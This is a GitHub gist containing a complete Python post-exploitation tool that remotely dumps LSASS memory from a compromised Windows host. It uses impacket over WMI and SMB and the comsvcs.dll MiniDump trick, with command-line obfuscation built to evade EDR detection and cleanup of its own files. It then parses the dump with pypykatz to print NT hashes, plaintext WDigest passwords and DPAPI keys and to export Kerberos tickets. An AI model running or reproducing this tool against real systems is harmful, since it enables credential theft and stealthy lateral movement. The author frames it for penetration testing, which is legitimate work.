Skip to content

Instantly share code, notes, and snippets.

@3xocyte
Last active April 24, 2023 12:26
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save 3xocyte/276acf752f5d8ed96c6d87fd7dca0740 to your computer and use it in GitHub Desktop.
Save 3xocyte/276acf752f5d8ed96c6d87fd7dca0740 to your computer and use it in GitHub Desktop.
quickly dump creds from a box you've pwned while living off the land (feat. obfuscation and pypykatz automation)
#!/usr/bin/env python3
import argparse
import sys
import logging
import random
import string
import os
from time import sleep
from impacket.examples import logger
from impacket.smbconnection import SMBConnection
from impacket import version
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5.dcom import wmi
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.smbconnection import SMBConnection
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_LEVEL_PKT_INTEGRITY
logger.init()
# TODO:
# * obfuscation functions need some TLC, currently it's possible (though uncommon)
# that they'll fail and the created directory needs to be cleaned up manually
# * pypykatz functionality is literally tacked on to the end, should be in their own
# functions
# * add some control over output directory
# OPSEC note:
# * command line obfuscation will only hide the command line argument that the cmd
# process created by Win32_Process.Create is launched with; the rundll32 process's
# command line argument property will still look dodgy, but it's the cmd process
# that will get the most attention anyway. This tool is for evading blocks on
# internal penetration tests, not red teaming in high security environments.
def randomise_case(randomise):
return ''.join(random.choice((x,y)) for x,y in zip(randomise.upper(), randomise.lower()))
# pretty buggy, needs better tracking for variable name reuse, and a whole refactor
# idea from https://github.com/danielbohannon/Invoke-DOSfuscation
def obfuscate_char_replace(command):
start = randomise_case('cmd /v:ON/c')
replace_chars = string.ascii_lowercase + string.digits
for c in command:
if c in replace_chars:
replace_chars = replace_chars.replace(c,'')
command_alphachar = ''.join(ch for ch in command if ch.isalnum())
no_chars = random.randrange(2,len(replace_chars))
var_len = random.randrange(2,10)
random_var = ''.join(random.choices(string.ascii_lowercase + string.digits, k=(var_len)))
here = '%s" %s %s=%s"' % (start, randomise_case("set"), random_var, command)
randomise_characters = []
random_characters = []
randomise_characters_dict = {}
final_random_var = ''.join(random.choices(string.ascii_lowercase + string.digits, k=(var_len)))
i = 0
while i < no_chars:
random_var2 = ''.join(random.choices(string.ascii_lowercase+ string.digits, k=(var_len)))
replace_char = ''.join(random.choices(replace_chars, k=(1)))
string_char = ''.join(random.choices(command_alphachar, k=(1)))
if not replace_char in random_characters and not string_char in randomise_characters:
random_characters.append(replace_char)
randomise_characters.append(string_char)
assoc_dict = {}
assoc_dict[string_char] = replace_char
randomise_characters_dict[random_var2] = (assoc_dict)
i += 1
convert_list = []
call_list = []
converted_command = '"%s %s=' % (randomise_case("set"), random_var)
track_reuse = []
i = 0
for k,v in randomise_characters_dict.items():
for rsc, rc in v.items():
# print("%s: %s" % (k, v))
track_reuse.append(k)
if not k == track_reuse[i-1]:
convert = '&&%s %s=!%s:%s=%s!' % (randomise_case("set"), k, track_reuse[i-1], rc, rsc)
else:
convert = '&&%s %s=!%s:%s=%s!' % (randomise_case("set"), k, random_var, rc, rsc)
i += 1
command = command.replace(rsc, rc)
# print(command +"\n")
convert_list.append(convert)
call = randomise_case("call")
call_list.append("&&" + call + " %" + k + '%"')
command = converted_command + command
for c in convert_list:
command +=c
command = start + command + call_list[-1]
return command
# kind of a mess but it's reliable >95% of the time
# idea from https://github.com/danielbohannon/Invoke-DOSfuscation
def obfuscate_concat(command):
command_length = len(command)
start = randomise_case('cmd /c"')
# maximum slice length
min_slice = int(command_length/random.randrange(8, 20))
max_slice = int(command_length/random.randrange(5, 8))
slice_dict = {}
i = 0 # index
c = 0 # count
remaining = command
random_vars = [] # for preventing variable name reuse
while c < command_length:
# attempt bugfix
random_var = ''.join(random.choices(string.ascii_lowercase + string.ascii_uppercase, k=(random.randrange(2,5))))
while random_var.upper() in random_vars:
random_var = ''.join(random.choices(string.ascii_lowercase + string.ascii_uppercase, k=(random.randrange(2,5))))
random_vars.append(random_var.upper())
get_slice_length = random.randrange(min_slice, max_slice)
save_slice = remaining[:get_slice_length]
remaining = remaining[get_slice_length:]
var_dict = {}
var_dict[random_var] = save_slice
slice_dict[i]=var_dict
i += 1
c += get_slice_length
dict_length = len(slice_dict)
keys = list(range(0, dict_length))
random.shuffle(keys)
obfuscated_command = ""
for i in keys:
for k, v in slice_dict[i].items():
call_var = "%s %s=%s&&" % (randomise_case("set"), k, v)
obfuscated_command += call_var
random_var = ''.join(random.choices(string.ascii_lowercase + string.ascii_uppercase + string.digits, k=(random.randrange(2,5))))
obfuscated_command = obfuscated_command + randomise_case("call") + randomise_case(" set ") + random_var + "="
reconstructed_command = ''
i = 0
while i < dict_length:
for k,v in slice_dict[i].items():
reconstructed_command += v
obfuscated_command += "%" + k + "%"
i += 1
obfuscated_command += "&&" +randomise_case("call")+" %" + random_var + "%"
obfuscated = start + obfuscated_command + '"'
return obfuscated
def create_directory(smb_client, share):
dir_name = ''.join(random.choices(string.ascii_lowercase, k=random.randrange(3,6)))
smb_client.createDirectory(share, dir_name)
logging.debug("created directory: %s on %s" % (dir_name, share))
return dir_name
def execute_dump(dcom, namespace, dir_name, obfs_concat=False, obfs_replace=False):
iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,wmi.IID_IWbemLevel1Login)
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
iWbemServices= iWbemLevel1Login.NTLMLogin(namespace, NULL, NULL)
iWbemLevel1Login.RemRelease()
logging.info("created WMI session with provided credentials")
# first we get LSASS's pid using WQL
iEnumWbemClassObject = iWbemServices.ExecQuery('SELECT ProcessId From Win32_Process WHERE Name = "lsass.exe"')
pEnum = iEnumWbemClassObject.Next(0xffffffff,1)[0]
lsass_pid = pEnum.ProcessId
iEnumWbemClassObject.RemRelease()
logging.debug("found lsass PID: %s" % lsass_pid)
# now we build the command
directory = "C:\\%s\\" % dir_name
dump_name = ''.join(random.choices(string.ascii_lowercase, k=random.randrange(3,6)))
dump_location = directory + dump_name
comsvcs_command = "rundll32.exe c:\windows\system32\comsvcs.dll"
full = "full"
prep_command = "%s, MiniDump %s %s %s" % (comsvcs_command, lsass_pid, dump_location, full)
logging.debug("command: %s" % prep_command)
if obfs_concat == True:
command = obfuscate_concat(prep_command)
# keep trying until likely EDR triggers aren't in the command
while "Mini" in command or "Dump" in command or "full" in command:
command = obfuscate_concat(prep_command)
logging.debug("obfuscated command: %s" % command)
elif obfs_replace == True:
command = obfuscate_char_replace(prep_command)
# keep trying until likely EDR triggers aren't in the command
while "Mini" in command or "Dump" in command or "full" in command:
command = obfuscate_char_replace(prep_command)
logging.debug("obfuscated command: %s" % command)
else:
command = prep_command
logging.info("executing: %s" % command)
# create the process
win32Process,_ = iWbemServices.GetObject("Win32_Process")
win32Process.Create(command, "C:\\", None)
win32Process.RemRelease()
iWbemServices.RemRelease()
return dump_name
def get_dump(smb_client, target, share, dir_name, dump_name):
dump_file = "%s\\%s" % (dir_name, dump_name)
minidump_out = "%s_dump/lsass.dmp" % target
fh = open(minidump_out,'wb')
while True:
try:
smb_client.getFile(share, dump_file, fh.write)
logging.info("got dump file: %s" % minidump_out)
fh.close()
break
except Exception as e:
logging.debug("failed to get %s, retrying..." % dump_file)
sleep(1)
return minidump_out
def clean_filesystem(smb_client, share, dir_name, dump_name):
try:
dump_file = "%s\\%s" % (dir_name, dump_name)
smb_client.deleteFile(share, dump_file)
logging.debug("deleted %s" % dump_file)
smb_client.deleteDirectory(share, dir_name)
logging.debug("removed %s" % dir_name)
return True
except Exception as e:
logging.debug(e)
return False
def main():
parser = argparse.ArgumentParser(add_help = True, description = "auto lsass dumping post-exploitation utility (by @3xocyte)")
parser.add_argument('-u', '--username', action="store", default='', help='valid username')
parser.add_argument('-p', '--password', action="store", default='', help='valid password')
parser.add_argument('-d', '--domain', action="store", default='', help='valid domain name')
parser.add_argument('--nt', action="store", default='', help='nt hash')
obfuscation_group = parser.add_mutually_exclusive_group()
obfuscation_group.add_argument('--obfs-concat', action="store_true", default="False", help='obfuscate dump command with variable concacenation (experimental!)')
obfuscation_group.add_argument('--obfs-char-replace', action="store_true", default="False", help='obfuscate dump command with environment variable char replacement (experimental!)')
parser.add_argument('--debug', action="store_true", help='debug mode (very verbose!)')
parser.add_argument('--parse', action="store_true", default=False, help='get pypykatz raw output, json output, and kerberos tickets, also try to display some unique creds')
parser.add_argument('--dpapi', action="store_true", default=False, help='when using pypykatz, try to display unique dpapi keys')
parser.add_argument('target', help='ip address or hostname of target')
if len(sys.argv) == 1:
parser.print_help()
print("\nrequires python3, the impacket and pypykatz packages installed")
print("\nexamples: ")
print("\nget an lsass minidump from a single target")
print("\t./lazykatz.py -d <domain> -u <username> -p '<password>' 192.168.1.12")
print("\nget an lsass minidump from a single target and quickly parse it for creds")
print("\t./lazykatz.py -d <domain> -u <username> -p '<password>' --parse 192.168.1.12\n")
print("\nuse obfuscation with concatenation to get an lsass minidump from a single target, and quickly parse it for creds")
print("\t./lazykatz.py -d <domain> -u <username> -p '<password>' --parse --obfs-concat 192.168.1.12\n")
print("\nuse obfuscation with character replacement to get an lsass minidump from a single target")
print("\t./lazykatz.py -d <domain> -u <username> -p '<password>' --obfs-char-replace 192.168.1.12\n")
sys.exit(0)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
domain = options.domain
username = options.username
password = options.password
address = options.target
obfs_concat = options.obfs_concat
obfs_replace = options.obfs_char_replace
if options.nt:
nthash = options.nt
lmhash = '0'
else:
nthash = ''
lmhash = ''
share = "C$"
try:
os.mkdir('./%s_dump' % address)
logging.debug('created directory: ./%s_dump' % address)
except FileExistsError as e:
logging.debug('directory exists')
pass
except Exception as e:
logging.debug('directory creation error: %s' % e)
sys.exit(1)
try:
smb_client = SMBConnection(address, address)
smb_client.login(username, password, domain, lmhash, nthash)
except Exception as e:
logging.info("login failed")
logging.debug('login error: %s' % e)
sys.exit(1)
try:
smb_client.connectTree(share)
logging.info("connected to %s using provided credentials" % share)
except Exception as e:
import traceback
traceback.print_exc()
logging.info("failed to connect to %s" % share)
logging.debug(e)
sys.exit(1)
directory = create_directory(smb_client, share)
dcom = DCOMConnection(address, username, password, domain, lmhash, nthash)
namespace = '//%s/root/cimv2' % address
if obfs_concat == True:
dump = execute_dump(dcom, namespace, directory, obfs_concat = True)
elif obfs_replace == True:
dump = execute_dump(dcom, namespace, directory, obfs_replace = True)
else:
dump = execute_dump(dcom, namespace, directory)
dcom.disconnect()
dump_output = get_dump(smb_client, address, share, directory, dump)
if clean_filesystem(smb_client, share, directory, dump):
logging.info("finished filesystem cleanup")
smb_client.close()
logging.info("connections closed")
# pypykatz stuff, should go into its own function
if options.parse:
logging.info("quickly parsing dump file")
try:
from pypykatz.pypykatz import pypykatz
from pypykatz.commons.common import UniversalEncoder
import json
except:
logging.error("unable to import pypykatz, try 'sudo pip3 install pypykatz'")
sys.exit(1)
results = {}
try:
os.mkdir('./%s_dump/kirbi' % address)
logging.debug('created directory: ./%s_dump' % address)
except FileExistsError as e:
logging.debug('directory exists')
pass
mimi = pypykatz.parse_minidump_file(dump_output)
mimi.kerberos_ccache.to_kirbidir('./%s_dump/kirbi' % address)
logging.debug('dumped kirbi tickets to directory ./%s_dump/kirbi' % address)
out_txt_file = open('./%s_dump/pypykatz.txt' % address, 'a')
for k,v in mimi.to_dict()['logon_sessions'].items():
out_txt_file.write('%s' % v)
for c in mimi.to_dict()['orphaned_creds']: # what about orphaned sessions? requires testing
out_txt_file.write('%s' % c)
out_txt_file.close()
logging.debug('wrote raw pypykatz output to ./%s_dump/pypykatz.txt' % address)
mimi_json = json.dumps(mimi, cls = UniversalEncoder, sort_keys=True)
out_json_file = open('./%s_dump/pypykatz.json' % address, 'w')
out_json_file.write(mimi_json)
out_json_file.close()
logging.debug('wrote json output to ./%s_dump/pypykatz.json' % address)
results_json = json.loads(mimi_json)
pwned_msv = []
pwned_wdigest = []
pwned_dpapi = []
for session in results_json['logon_sessions']:
user = results_json['logon_sessions'][session]['username']
if user:
try:
msv = results_json['logon_sessions'][session]['msv_creds'][0]
if msv not in pwned_msv:
if msv['NThash']:
print()
print('[MSV]')
print("{: <20}{}".format("domain", msv['domainname']))
print("{: <20}{}".format("username", msv['username']))
print("{: <20}{}".format("nt hash", msv['NThash']))
print("{: <20}{}".format("sha1 hash", msv['SHAHash']))
pwned_msv.append(msv)
except:
pass
try:
wdigest = results_json['logon_sessions'][session]['msv_creds'][0]
if wdigest not in pwned_wdigest:
if wdigest['password']:
print()
print('[WDigest]')
print("{: <20}{}".format("domain", wdigest['domainname']))
print("{: <20}{}".format("username", wdigest['username']))
print("{: <20}{}".format("password", wdigest['password']))
pwned_wdigest.append(wdigest)
except:
pass
if options.dpapi:
try:
dpapi = results_json['logon_sessions'][session]['dpapi_creds']
if dpapi not in pwned_dpapi:
print()
print('[DPAPI]')
for cred in dpapi:
print("{: <20}{}".format("username", user))
print("{: <20}{}".format("key guid", cred['key_guid']))
print("{: <20}{}".format("masterkey", cred['masterkey']))
print("{: <20}{}".format("sha1 masterkey", cred['sha1_masterkey']))
pwned_dpapi.append(dpapi)
except:
pass
else:
sys.exit()
if __name__ == '__main__':
main()
@3xocyte
Copy link
Author

3xocyte commented Feb 8, 2021

This script depended on the then-current version of pypykatz, which has since had breaking changes.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment